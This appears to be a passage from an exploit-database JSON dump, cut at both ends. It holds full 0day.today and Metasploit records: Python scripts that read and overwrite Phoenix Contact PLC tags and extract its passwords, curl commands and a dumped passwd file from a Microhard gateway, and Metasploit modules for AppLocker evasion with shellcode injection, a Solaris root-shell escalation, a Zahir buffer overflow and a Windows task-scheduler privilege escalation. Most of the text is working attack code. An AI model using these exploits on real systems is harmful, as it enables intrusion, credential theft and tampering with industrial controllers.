')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n \r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n \r\n \r\nraw_input('Press Enter to query them all')\r\nimport os, urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n \r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name = item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n \r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))\n\n# 0day.today [2018-10-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31316"}, {"lastseen": "2018-10-11T18:54:19", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "1337DAY-ID-31303", "href": "https://0day.today/exploit/description/31303", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n \r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n \r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n \r\n# PoC\r\n \r\n#! /usr/bin/env python\r\n \r\nimport urllib2, binascii\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n \r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n \r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')\n\n# 0day.today [2018-10-11] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/31303"}, {"lastseen": "2018-07-17T20:05:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30738", "href": "https://0day.today/exploit/description/30738", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective\r\nname based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'\r\nand the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain\r\ncircumstances. This will enable the attacker to disclose sensitive information and help her\r\nin authentication bypass, privilege escalation and/or full system access.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5484\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n/etc/m_cli/cli.conf:\r\n--------------------\r\n \r\ncurl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\" |grep passwd\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577\r\npasswd admin \r\n \r\n \r\n/www/IPn4G.config:\r\n------------------\r\n \r\n[email\u00a0protected]:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512\r\n[email\u00a0protected]:~$ tar -zxf IPn4G.tar.gz ; ls\r\nconfig.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr\r\n[email\u00a0protected]:~$ cat config.boardinfo config.boardtype config.date config.name \r\n2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0\r\nAtheros AR7130 rev 2\r\nThu Jul 12 12:42:42 PDT 2018\r\nIPn4G\r\n[email\u00a0protected]:~$ cat usr/lib/hardware_desc \r\nmodem_type=\"N930\"\r\nLTE_ATCOMMAND_PORT=\"/dev/ttyACM0\"\r\nLTE_DIAG_PORT=\"\"\r\nLTE_GPS_PORT=\"\"\r\nwificard = \"0\"\r\n[email\u00a0protected]:~$ ls etc/\r\nconfig crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl\r\n[email\u00a0protected]:~$ ls etc/config/\r\ncomport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control\r\ncomport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver\r\ncoova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless\r\ncron eurd gre-tunnels localmonitor network pimd system vnstat wsclient\r\ncrontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc\r\ndatausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif\r\n[email\u00a0protected]:~$ cat etc/passwd \r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n/www/cgi-bin/system.conf:\r\n-------------------------\r\n \r\n[email\u00a0protected]:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n[email\u00a0protected]:~$ cat system.conf |grep -irnH \"password\" -A2\r\nsystem.conf:236:#VPN Admin Password:\r\nsystem.conf-237-NetWork_IP_VPN_Passwd=admin\r\nsystem.conf-238-\r\n--\r\nsystem.conf:309:#V3 Authentication Password:\r\nsystem.conf:310:NetWork_SNMP_V3_Auth_Password=00000000\r\nsystem.conf-311-\r\nsystem.conf:312:#V3 Privacy Password:\r\nsystem.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000\r\n \r\n \r\nLogin to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.\r\n---------------------------------------------------------------------------------------------\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30738"}], "metasploit": [{"lastseen": "2019-11-28T22:57:19", "bulletinFamily": "exploit", "description": "This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary PresentationHost.exe to execute user supplied code.\n", "modified": "2019-08-03T09:41:13", "published": "2019-08-01T07:40:30", "id": "MSF:EVASION/WINDOWS/APPLOCKER_EVASION_PRESENTATIONHOST", "href": "", "type": "metasploit", "title": "Applocker Evasion - Windows Presentation Foundation Host", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',\n 'Description' => %(\n This module will assist you in evading Microsoft\n Windows Applocker and Software Restriction Policies.\n This technique utilises the Microsoft signed binary\n PresentationHost.exe to execute user supplied code.\n ),\n 'Author' =>\n [\n 'Nick Tyrer <@NickTyrer>', # module development\n 'Casey Smith' # presentationhost bypass research\n ],\n 'License' => 'MSF_LICENSE',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86],\n 'Targets' => [['Microsoft Windows', {}]])\n )\n\n register_options(\n [\n OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),\n OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),\n OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])\n ]\n )\n\n deregister_options('FILENAME')\n end\n\n def build_payload\n Rex::Text.encode_base64(payload.encoded)\n end\n\n def obfu\n Rex::Text.rand_text_alpha 8\n end\n\n def presentationhost_xaml_cs\n esc = build_payload\n mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]\n <<~HEREDOC\n using System;\n class #{mod[0]}{\n static void Main(string[] args){\n IntPtr #{mod[1]};\n #{mod[1]} = GetConsoleWindow();\n ShowWindow(#{mod[1]}, #{mod[2]});\n string #{mod[3]} = \"#{esc}\";\n byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});\n byte[] #{mod[5]} = #{mod[4]};\n IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});\n System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);\n IntPtr #{mod[9]} = IntPtr.Zero;\n WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}\n private static Int32 #{mod[7]}=0x1000;\n private static IntPtr #{mod[8]}=(IntPtr)0x40;\n private static UInt32 #{mod[10]} = 0xFFFFFFFF;\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);\n [System.Runtime.InteropServices.DllImport(\"user32.dll\")]\n static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);\n [System.Runtime.InteropServices.DllImport(\"Kernel32\")]\n private static extern IntPtr GetConsoleWindow();\n const int #{mod[2]} = 0;}\n HEREDOC\n end\n\n def presentationhost_manifest\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <assembly manifestVersion=\"1.0\" xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\" />\n <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">\n <security>\n <applicationRequestMinimum>\n <defaultAssemblyRequest permissionSetReference=\"Custom\" />\n <PermissionSet class=\"System.Security.PermissionSet\" version=\"1\" ID=\"Custom\" SameSite=\"site\" Unrestricted=\"true\" />\n </applicationRequestMinimum>\n <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />\n </requestedPrivileges>\n </security>\n </trustInfo>\n </assembly>\n HEREDOC\n end\n\n def presentationhost_csproj\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n <Import Project=\"$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props')\" />\n <PropertyGroup>\n <Configuration Condition=\" '$(Configuration)' == '' \">Release</Configuration>\n <Platform Condition=\" '$(Platform)' == '' \">x86</Platform>\n <OutputType>WinExe</OutputType>\n <HostInBrowser>true</HostInBrowser>\n <GenerateManifests>true</GenerateManifests>\n <SignManifests>false</SignManifests>\n </PropertyGroup>\n <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|x86' \">\n <Optimize>true</Optimize>\n <OutputPath>.</OutputPath>\n </PropertyGroup>\n <ItemGroup>\n <Reference Include=\"System\" />\n </ItemGroup>\n <ItemGroup>\n <Compile Include=\"#{datastore['CS_FILE']}\">\n <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>\n <SubType>Code</SubType>\n </Compile>\n </ItemGroup>\n <ItemGroup>\n <None Include=\"#{datastore['MANIFEST_FILE']}\" />\n </ItemGroup>\n <Import Project=\"$(MSBuildToolsPath)\\\\Microsoft.CSharp.targets\" />\n </Project>\n HEREDOC\n end\n\n def file_format_filename(name = '')\n name.empty? ? @fname : @fname = name\n end\n\n def create_files\n f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']\n f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')\n f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']\n f2 << '.manifest' unless f2.downcase.end_with?('.manifest')\n f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']\n f3 << '.csproj' unless f3.downcase.end_with?('.csproj')\n cs_file = presentationhost_xaml_cs\n manifest_file = presentationhost_manifest\n csproj_file = presentationhost_csproj\n file_format_filename(f1)\n file_create(cs_file)\n file_format_filename(f2)\n file_create(manifest_file)\n file_format_filename(f3)\n file_create(csproj_file)\n end\n\n def instructions\n print_status \"Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target\"\n print_status \"Compile using: C:\\\\Windows\\\\Microsoft.Net\\\\Framework\\\\[.NET Version]\\\\MSBuild.exe #{datastore['CSPROJ_FILE']}\"\n print_status \"Execute using: C:\\\\Windows\\\\System32\\\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}\"\n end\n\n def run\n create_files\n instructions\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/applocker_evasion_presentationhost.rb"}, {"lastseen": "2019-10-23T20:30:15", "bulletinFamily": "exploit", "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.\n", "modified": "2019-02-01T22:58:21", "published": "2019-02-01T22:58:21", "id": "MSF:POST/SOLARIS/ESCALATE/PFEXEC", "href": "", "type": "metasploit", "title": "Solaris pfexec Upgrade Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris pfexec Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell session to UID 0 using pfexec.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['bcoles'],\n 'Platform' => 'solaris',\n 'References' =>\n [\n ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],\n ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],\n ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']\n ],\n 'SessionTypes' => ['shell']\n ))\n register_options [\n OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),\n OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])\n ]\n end\n\n def shell_path\n datastore['SHELL_PATH'].to_s\n end\n\n def pfexec_path\n datastore['PFEXEC_PATH'].to_s\n end\n\n def run\n unless session.type == 'shell'\n fail_with Failure::BadConfig, \"This module is not compatible with #{session.type} sessions\"\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless command_exists? pfexec_path\n fail_with Failure::NotVulnerable, \"#{pfexec_path} does not exist\"\n end\n\n user = cmd_exec('id -un').to_s\n\n print_status \"Trying pfexec as `#{user}' ...\"\n\n res = cmd_exec \"#{pfexec_path} #{shell_path} -c id\"\n vprint_status res\n\n unless res.include? 'uid=0'\n fail_with Failure::NotVulnerable, \"User `#{user}' does not have permission to escalate with pfexec\"\n end\n\n print_good 'Success! Upgrading session ...'\n\n cmd_exec \"#{pfexec_path} #{shell_path}\"\n\n unless is_root?\n fail_with Failure::NotVulnerable, 'Failed to escalate'\n end\n\n print_good 'Success! root shell secured'\n report_note(\n :host => session,\n :type => 'host.escalation',\n :data => \"User `#{user}' pfexec'ed to a root shell\"\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/solaris/escalate/pfexec.rb"}, {"lastseen": "2019-12-12T23:12:34", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters via Import from other File. This results in overwriting a structured exception handler record.\n", "modified": "2018-10-04T15:10:09", "published": "2018-09-29T11:59:14", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ZAHIR_ENTERPRISE_PLUS_CSV", "href": "", "type": "metasploit", "title": "Zahir Enterprise Plus 6 Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Zahir Enterprise Plus 6 Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f3ci', # initial discovery\n 'modpr0be' # poc and Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2018-17408' ],\n [ 'EDB', '45505' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Zahir Enterprise Plus 6 <= build 10b',\n {\n #P/P/R from vclie100.bpl (C:\\Program Files\\Zahir Personal 6 - Demo Version\\vclie100.bpl)\n 'Ret' => 0x52016661,\n 'Offset' => 3041\n }\n ]\n ],\n 'Payload' =>\n {\n 'Space' => 5000,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x22\\x2c\",\n 'DisableNops' => true\n },\n 'DisclosureDate' => 'Sep 28 2018',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])\n ])\n end\n\n def exploit\n buf = rand_text_alpha_upper(target['Offset'])\n buf << \"\\r\\n\" # crash chars\n buf << rand_text_alpha_upper(380) # extra chars to hit the offset\n buf << generate_seh_record(target.ret)\n buf << payload.encoded\n\n file_create(buf)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb"}, {"lastseen": "2019-10-30T23:07:55", "bulletinFamily": "exploit", "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file. WARNING: The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host will be overwritten when the exploit runs. This module has been tested against Windows 10 Pro x64.\n", "modified": "2018-09-27T02:13:37", "published": "2018-09-13T23:00:20", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/ALPC_TASKSCHEDULER", "href": "", "type": "metasploit", "title": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry' #TODO: Do we need this?\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',\n 'Description' => %q(\n On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll 